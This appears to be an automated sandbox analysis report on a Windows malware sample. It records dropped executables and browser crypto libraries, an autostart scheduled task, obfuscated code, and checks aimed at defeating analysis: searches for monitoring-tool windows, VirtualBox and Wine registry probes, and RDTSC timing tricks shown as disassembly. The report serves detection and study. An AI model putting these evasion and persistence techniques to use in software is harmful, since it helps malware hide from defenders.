Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: kcajosdi
Source: amadka[1].exe.0.dr Static PE information: section name: tlivgrwy
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name:
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: .idata
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name:
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: kcajosdi
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: tlivgrwy
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: explortu.exe.8.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name: .idata
Source: explortu.exe.8.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name: kcajosdi
Source: explortu.exe.8.dr Static PE information: section name: tlivgrwy
Source: explortu.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7FB536 push ecx; ret 0_2_6C7FB549
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_0023CFEC push ecx; ret 10_2_0023CFFF
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212820 push 7F210002h; ret 13_2_7F21282F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211C20 push 7F210002h; ret 13_2_7F211C2F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211920 push 7F210002h; ret 13_2_7F21192F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F210D20 push 7F210002h; ret 13_2_7F210D2F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211020 push 7F210002h; ret 13_2_7F21102F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211320 push 7F210002h; ret 13_2_7F21132F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211620 push 7F210002h; ret 13_2_7F21162F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211F20 push 7F210002h; ret 13_2_7F211F2F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212220 push 7F210002h; ret 13_2_7F21222F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212520 push 7F210002h; ret 13_2_7F21252F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212A30 push 7F210002h; ret 13_2_7F212A3F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212730 push 7F210002h; ret 13_2_7F21273F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211B30 push 7F210002h; ret 13_2_7F211B3F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F210C30 push 7F210002h; ret 13_2_7F210C3F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F210F30 push 7F210002h; ret 13_2_7F210F3F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211230 push 7F210002h; ret 13_2_7F21123F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211530 push 7F210002h; ret 13_2_7F21153F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211830 push 7F210002h; ret 13_2_7F21183F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211E30 push 7F210002h; ret 13_2_7F211E3F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212130 push 7F210002h; ret 13_2_7F21213F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212430 push 7F210002h; ret 13_2_7F21243F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212A00 push 7F210002h; ret 13_2_7F212A0F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212700 push 7F210002h; ret 13_2_7F21270F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212400 push 7F210002h; ret 13_2_7F21240F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212100 push 7F210002h; ret 13_2_7F21210F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211E00 push 7F210002h; ret 13_2_7F211E0F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211B00 push 7F210002h; ret 13_2_7F211B0F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211800 push 7F210002h; ret 13_2_7F21180F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F210000 push edi; mov dword ptr [esp], esi 13_2_7F2100B5
Source: EZrw1nNIpG.exe Static PE information: section name: entropy: 7.995804911352308
Source: EZrw1nNIpG.exe Static PE information: section name: entropy: 7.978361575135612
Source: EZrw1nNIpG.exe Static PE information: section name: entropy: 7.950738565954194
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.986768958978906
Source: amadka[1].exe.0.dr Static PE information: section name: kcajosdi entropy: 7.955236548393852
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: entropy: 7.986768958978906
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: kcajosdi entropy: 7.955236548393852
Source: explortu.exe.8.dr Static PE information: section name: entropy: 7.986768958978906
Source: explortu.exe.8.dr Static PE information: section name: kcajosdi entropy: 7.955236548393852
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.995210658613367
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.9817377290068
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.947361946751107
Source: 3eb62d09c2.exe.10.dr Static PE information: section name: entropy: 7.995210658613367
Source: 3eb62d09c2.exe.10.dr Static PE information: section name: entropy: 7.9817377290068
Source: 3eb62d09c2.exe.10.dr Static PE information: section name: entropy: 7.947361946751107
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File created: C:\Windows\Tasks\explortu.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8255F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C8255F0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41DAE5 second address: 41DAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4380CE second address: 4380D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4380D6 second address: 4380DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C2DC second address: 43C34B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F742CC44208h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D3692h] 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F742CC44208h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 mov edx, dword ptr [ebp+122D36EAh] 0x0000004a call 00007F742CC44209h 0x0000004f push ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F742CC4420Ah 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C34B second address: 43C36F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F742CEB81D9h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C36F second address: 43C39F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jbe 00007F742CC44212h 0x00000014 jbe 00007F742CC4420Ch 0x0000001a je 00007F742CC44206h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 je 00007F742CC4420Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C4CF second address: 43C4E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C4E4 second address: 43C4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C4EA second address: 43C4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C4EE second address: 43C501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F742CC44208h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C501 second address: 43C529 instructions: 0x00000000 rdtsc 0x00000002 js 00007F742CEB81C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 js 00007F742CEB81E2h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F742CEB81D0h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C529 second address: 43C53A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F742CC44206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C53A second address: 43C545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F742CEB81C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C545 second address: 43C5C6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F742CC44218h 0x00000008 jmp 00007F742CC44212h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 pushad 0x00000015 jmp 00007F742CC44214h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d pop edi 0x0000001e pop eax 0x0000001f mov dword ptr [ebp+122D33B3h], ebx 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F742CC44208h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 mov esi, dword ptr [ebp+122D2DB9h] 0x00000047 push 00000000h 0x00000049 mov edx, ebx 0x0000004b push 00000003h 0x0000004d jmp 00007F742CC4420Ch 0x00000052 push E025D071h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b pop edi 0x0000005c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C5C6 second address: 43C5DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 44CFFB second address: 44D001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45AAD6 second address: 45AAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F742CEB81CAh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45AAF4 second address: 45AB0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F742CC44206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F742CC4420Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45AB0C second address: 45AB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45AB12 second address: 45AB18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45AC9A second address: 45ACA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45ACA0 second address: 45ACA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45ACA6 second address: 45ACB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45ACB1 second address: 45ACBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F742CC44206h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45ACBD second address: 45ACC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45B1BE second address: 45B1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F742CC44212h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45B1D9 second address: 45B1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41BF25 second address: 41BF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 463FAB second address: 463FB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
